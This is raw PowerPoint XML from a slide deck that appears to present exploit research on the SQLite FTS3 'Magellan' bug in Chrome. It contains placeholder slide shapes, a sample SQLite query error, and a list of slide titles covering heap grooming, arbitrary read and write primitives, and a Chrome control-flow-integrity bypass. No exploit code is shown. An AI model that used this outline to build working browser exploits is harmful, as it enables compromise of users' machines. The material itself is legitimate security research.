            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rectangle 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1390063" y="28401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2082792" y="284019"/>
            <a:ext cx="983672"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1694863" y="42487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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3565226" y="549563"/>
            <a:ext cx="1995055"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Rectangle 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6059046" y="558799"/>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Rectangle 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9236355" y="692725"/>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Rectangle 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4802900" y="277091"/>
            <a:ext cx="25076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Rectangle 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10991265" y="277091"/>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Rectangle 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8931554" y="427182"/>
            <a:ext cx="1607127" cy="131617"/>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Rectangle 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7527627" y="558799"/>
            <a:ext cx="4331853"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Rectangle 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8506682" y="284019"/>
            <a:ext cx="120072" cy="140854"/>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Rectangle 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2881737" y="415637"/>
            <a:ext cx="812798"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Rectangle 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6728685" y="420253"/>
            <a:ext cx="30480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Rectangle 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2687773" y="692725"/>
            <a:ext cx="170870" cy="133926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>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9" name="TextBox 48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1428166" y="2252310"/>
            <a:ext cx="10379355" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>table1’s column name AAAAAAAAAAAAA……………………….</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="TextBox 49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1428166" y="2786350"/>
            <a:ext cx="10379355" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>table2’s column name AAAAAAAAAAAAA……………………….</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="TextBox 50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1428165" y="3303575"/>
            <a:ext cx="10379355" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>table3’s column name AAAAAAAAAAAAA……………………….</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="TextBox 51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1428165" y="3820827"/>
            <a:ext cx="10379355" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>table4’s column name AAAAAAAAAAAAA……………………….</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="TextBox 52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1428164" y="4320981"/>
            <a:ext cx="10379355" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>table5’s column name AAAAAAAAAAAAA……………………….</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="TextBox 53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1428163" y="4842912"/>
            <a:ext cx="10379355" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>table6’s column name AAAAAA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ZZZZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>AAAA……………………….</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="TextBox 54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1428162" y="5360149"/>
            <a:ext cx="10379355" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>table7’s column name AAAAAAAAAAAAA……………………….</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="TextBox 55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1428161" y="5889777"/>
            <a:ext cx="10379355" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>table8’s column name AAAAAAAAAAAAA……………………….</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="TextBox 56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1468573" y="1282268"/>
            <a:ext cx="10261600" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>sqlite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>&gt; SELECT AAAAAAAAAAAAAA……. From table6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>⇒ “Error: no such column: AAAAAAAAAAA…”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Rectangle 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="212424" y="138544"/>
            <a:ext cx="11776375" cy="67194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Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4461157" y="4769608"/>
            <a:ext cx="1099124" cy="513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285050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0000FF"/>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18771</TotalTime>
  <Words>25210</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>3699</Paragraphs>
  <Slides>245</Slides>
  <Notes>245</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245</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="255" baseType="lpstr">
      <vt:lpstr>Monaco</vt:lpstr>
      <vt:lpstr>굴림체</vt:lpstr>
      <vt:lpstr>맑은 고딕</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>? WHOAMI ¿</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>The Magellan Bug</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>SQLite short intro</vt:lpstr>
      <vt:lpstr>SQLite Architecture</vt:lpstr>
      <vt:lpstr>Key takeaways</vt:lpstr>
      <vt:lpstr>Full Text Search Extensions</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Shadow Tables</vt:lpstr>
      <vt:lpstr>Shadow Tables</vt:lpstr>
      <vt:lpstr>Shadow Tables</vt:lpstr>
      <vt:lpstr>Shadow Tables</vt:lpstr>
      <vt:lpstr>Shadow Tables</vt:lpstr>
      <vt:lpstr>Key takeaways from shadow tables</vt:lpstr>
      <vt:lpstr>Fts3 Variable Length Integer Format</vt:lpstr>
      <vt:lpstr>Fts3 Variable Length Integer Format</vt:lpstr>
      <vt:lpstr>Fts3 Variable Length Integer Format</vt:lpstr>
      <vt:lpstr>Fts3 Variable Length Integer Format</vt:lpstr>
      <vt:lpstr>Fts3 Variable Length Integer Format</vt:lpstr>
      <vt:lpstr>Fts3 Variable Length Integer Format</vt:lpstr>
      <vt:lpstr>Fts3 Variable Length Integer Format</vt:lpstr>
      <vt:lpstr>Fts3 Variable Length Integer Format</vt:lpstr>
      <vt:lpstr>Segment B-Tree Format</vt:lpstr>
      <vt:lpstr>`tablename`_segdir Table</vt:lpstr>
      <vt:lpstr>Leaf node format</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Vulnerable Function</vt:lpstr>
      <vt:lpstr>Vulnerable Function</vt:lpstr>
      <vt:lpstr>Vulnerable Function</vt:lpstr>
      <vt:lpstr>Vulnerable Function</vt:lpstr>
      <vt:lpstr>Vulnerable Function</vt:lpstr>
      <vt:lpstr>Vulnerable Function</vt:lpstr>
      <vt:lpstr>Vulnerable Function</vt:lpstr>
      <vt:lpstr>Vulnerable Function</vt:lpstr>
      <vt:lpstr>Vulnerable Function</vt:lpstr>
      <vt:lpstr>Vulnerable Function</vt:lpstr>
      <vt:lpstr>Vulnerable Function</vt:lpstr>
      <vt:lpstr>Vulnerable Function</vt:lpstr>
      <vt:lpstr>Vulnerable Function</vt:lpstr>
      <vt:lpstr>The vulnerability</vt:lpstr>
      <vt:lpstr>The vulnerability</vt:lpstr>
      <vt:lpstr>Vulnerable Function</vt:lpstr>
      <vt:lpstr>Vulnerable Function</vt:lpstr>
      <vt:lpstr>Vulnerable Function</vt:lpstr>
      <vt:lpstr>Vulnerable Function</vt:lpstr>
      <vt:lpstr>Vulnerable Function</vt:lpstr>
      <vt:lpstr>What is controlled</vt:lpstr>
      <vt:lpstr>What is controlled</vt:lpstr>
      <vt:lpstr>What is controlled</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>The TCMalloc allocator</vt:lpstr>
      <vt:lpstr>The TCMalloc allocator</vt:lpstr>
      <vt:lpstr>The TCMalloc allocator</vt:lpstr>
      <vt:lpstr>My general approach to Exploitation</vt:lpstr>
      <vt:lpstr>My general approach to Exploitation</vt:lpstr>
      <vt:lpstr>My general approach to Exploitation</vt:lpstr>
      <vt:lpstr>My general approach to Exploitation</vt:lpstr>
      <vt:lpstr>My general approach to Exploitation</vt:lpstr>
      <vt:lpstr>My general approach to Exploitation</vt:lpstr>
      <vt:lpstr>Current status</vt:lpstr>
      <vt:lpstr>Current status</vt:lpstr>
      <vt:lpstr>Current status</vt:lpstr>
      <vt:lpstr>Finding the right object to corrupt</vt:lpstr>
      <vt:lpstr>Finding the right object to corrupt</vt:lpstr>
      <vt:lpstr>Finding the right object to corrupt</vt:lpstr>
      <vt:lpstr>Finding the right object to corrupt</vt:lpstr>
      <vt:lpstr>Finding the right object to corrupt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Masterplan</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>The Masterplan</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>The Refined Masterplan</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Problem with this approach</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Problem with this approach</vt:lpstr>
      <vt:lpstr>Problem with this approach</vt:lpstr>
      <vt:lpstr>How to deal with heap noise?</vt:lpstr>
      <vt:lpstr>How to deal with heap noise?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Plan</vt:lpstr>
      <vt:lpstr>Why did I have to scale it down on each stage?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>The Plan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Plan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Unicode problem</vt:lpstr>
      <vt:lpstr>The Unicode problem</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>The 4thbyte Heuristics</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>The default column</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>How to gain AAR</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Creating a complete AAR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At the time of the function pointer call</vt:lpstr>
      <vt:lpstr>The end</vt:lpstr>
      <vt:lpstr>……or not…?</vt:lpstr>
      <vt:lpstr>Porting the exploit to Chrome Stable Release</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Chrome’s Control Flow Integrity</vt:lpstr>
      <vt:lpstr>Chrome’s CFI</vt:lpstr>
      <vt:lpstr>Key observation</vt:lpstr>
      <vt:lpstr>Counterfeit Object Oriented Programing</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Finding an AAW vfgadget</vt:lpstr>
      <vt:lpstr>Finding an AAW vfgadget</vt:lpstr>
      <vt:lpstr>The AAW vfgadget</vt:lpstr>
      <vt:lpstr>The Plan</vt:lpstr>
      <vt:lpstr>Finding the return address</vt:lpstr>
      <vt:lpstr>Finding the return address</vt:lpstr>
      <vt:lpstr>Finding the return address</vt:lpstr>
      <vt:lpstr>Finding the return address</vt:lpstr>
      <vt:lpstr>Finding the return address</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>One vfgadget to rule them all</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>One vfgadget to rule them all</vt:lpstr>
      <vt:lpstr>Bypassing CFI be like…</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Site Isolation</vt:lpstr>
      <vt:lpstr>Site Isolation</vt:lpstr>
      <vt:lpstr>Site Isolation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>The benefits of Site Isolation for an exploit</vt:lpstr>
      <vt:lpstr>DEMO</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>The 4 elements for a Practical Exploit</vt:lpstr>
      <vt:lpstr>The 4 elements for a Practical Exploit</vt:lpstr>
      <vt:lpstr>The 4 elements for a Practical Exploit</vt:lpstr>
      <vt:lpstr>The 4 elements for a Practical Exploit</vt:lpstr>
      <vt:lpstr>The 4 elements for a Practical Exploit</vt:lpstr>
      <vt:lpstr>Improving speed</vt:lpstr>
      <vt:lpstr>Refining the exploit strategy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Emotion curve while developing the exploit</vt:lpstr>
      <vt:lpstr>But really…</vt:lpstr>
      <vt:lpstr>Special Thanks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Pics for blog post</dc:title>
  <dc:creator>Externalist</dc:creator>
  <cp:lastModifiedBy>Externalist</cp:lastModifiedBy>
  <cp:revision>1146</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-01-17T09:41:22Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-06-28T07:14:21Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/thumbnail.jpeg>
</file>